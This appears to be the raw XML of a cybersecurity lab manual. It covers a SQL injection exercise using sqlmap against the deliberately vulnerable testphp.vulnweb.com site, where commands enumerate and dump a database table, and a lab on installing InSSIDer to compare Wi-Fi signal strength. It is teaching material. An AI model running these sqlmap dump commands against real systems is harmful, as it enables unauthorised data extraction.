              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image14.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId115"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="532447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6(b), you can see that there are eight tables.</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Type the following command and press Enter to list information about the columns of a particular table, as shown in Figure 7(a): </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sqlmap -u  http://testphp.vulnweb.com/listproducts.php?cat=1 -D  acuart -T  products  –columns </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7(a) and 7(b) displays the output.</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905250"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="57"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531495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952875"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="16"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53340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Type the following command and press Enter to dump the data from the columns, as shown in Figure 8(a):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sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T products -C name --dump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8(a) and 8(b) displays the output.</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990975"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="60" name="image70.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image70.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId118"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="53149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962400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="14" name="image4.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image4.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId119"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="533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9</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Wireless Network threats (sniff wifi hotspots, analyze strength, discover wireless access points)</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use InSSIDer to check the wireless network strength. We will learn how to: 1. Install and configure InSSIDer. 2. Check the wireless signal strength. To carry out this lab, you will require the following: 1.Windows OS 2.Web browser with Internet connection 3.Administrative privileges.</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detect the wireless network strength, execute the following steps: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1.Type https://inssider.en.softonic.com/download in the address bar of a web browser, and press Enter, as shown in Figure.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2.In the webpage that opens, click on the link, Download InSSIDer for Windows, as shown in Figure 3.Click on Free Download, as shown in Figure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2495550"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="77"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3054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3.Click on Free Download, as shown in Figure </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886200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="76" name="image85.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image85.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId121"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="53149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4.Click on the downloaded files, as shown in Figure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857625"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="44"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53149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5.In the next screen that appears, click on Next, as shown in Figure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952750"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="88" name="image80.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image80.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId123"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="36290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6.In the next screen, click on the Everyone radio button,and then click Next, as shown in Figure </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981325"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="108"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36290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971800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="83"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3629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7.In the next screen that appears, click on Next, as shown in Figure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962275"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="13" name="image11.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image11.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId126"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="36290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8.Then the following screen will appear, as shown in Figure</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9500" cy="2962275"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="38" name="image33.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image33.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId127"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="36195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9.Then after the files gets installed, the following screen will appear, as shown in Figure. Click Close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125" cy="2962275"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="56"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36671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InSSIDer icon will appear on the desktop.</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10.Double click on the InSSIDer icon on the desktop. Then the following screen will appear, as shown in Figure.</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476625"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="50"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5334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11.Click on the Time Graph tab, as shown in Figure </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3400425"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="63" name="image60.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image60.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId130"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="53054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show the time graph of all the available SSID. We need to elect the particular SSID what we need to know</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12.Click on the particular SSID as shown in Figure 12. In this lab we have selected WSTREAM AP0 SSID </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409950"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="69" name="image68.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image68.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId131"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="53244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have to select another SSID for comparison</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13.Scroll down the SSID and select WStream AP -1, as shown in Figure. </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3429000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="67"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52768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14.Then the following screen will appear, as shown in Figure</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15.Click on the 2.4 GHz channels tab, as shown in Figure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3467100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="95"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3340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It will show 2.4 Ghz channels for two SSIDs,WStreamAP1 and WStream AP0.</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17.Click on the 5 Ghz channel, as shown in Figure. </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following screen will appear as shown in Figure.</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3429000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="79" name="image81.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image81.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId134"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="53149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you can see the signal strength for both the SSIDs. In this way, we can analyze wireless network strength with the help of InSSIDer tool</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tl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:footerReference r:id="rId135" w:type="default"/>
      <w:footerReference r:id="rId13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6.png"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image58.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image113.png"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image43.png"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image46.png"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image108.png"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image96.png"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image91.png"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image127.png"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image77.png"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.png"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image95.png"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image78.png"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image106.png"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image50.png"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image111.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image124.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image99.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image122.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image109.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image107.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image86.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image61.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image100.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image55.png"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image92.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image65.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image42.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image75.png"/><Relationship Id="rId128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image49.png"/><Relationship Id="rId127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/><Relationship Id="rId126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image128.png"/><Relationship Id="rId121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image85.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image76.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image48.png"/><Relationship Id="rId125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image82.png"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image87.png"/><Relationship Id="rId124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image104.png"/><Relationship Id="rId123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image80.png"/><Relationship Id="rId122" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image39.png"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image123.png"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image40.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image56.png"/><Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image47.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image120.png"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image129.png"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image114.png"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image67.png"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.png"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image94.png"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image70.png"/><Relationship Id="rId117" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image57.png"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image112.png"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image83.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image117.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image52.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image79.png"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image45.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image44.png"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image97.png"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image101.png"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image64.png"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image62.png"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image118.png"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image125.png"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image110.png"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image73.png"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image102.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53.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image38.png"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image115.png"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image71.png"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image116.png"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image89.png"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image72.png"/><Relationship Id="rId132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image69.png"/><Relationship Id="rId131" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image68.png"/><Relationship Id="rId130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image60.png"/><Relationship Id="rId136" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image81.png"/><Relationship Id="rId133" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image90.png"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image54.png"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image63.png"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image119.png"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image66.png"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image121.png"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image103.png"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image93.png"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image105.png"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image98.png"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image59.png"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image74.png"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.png"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image51.png"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image41.png"/><Relationship Id="rId5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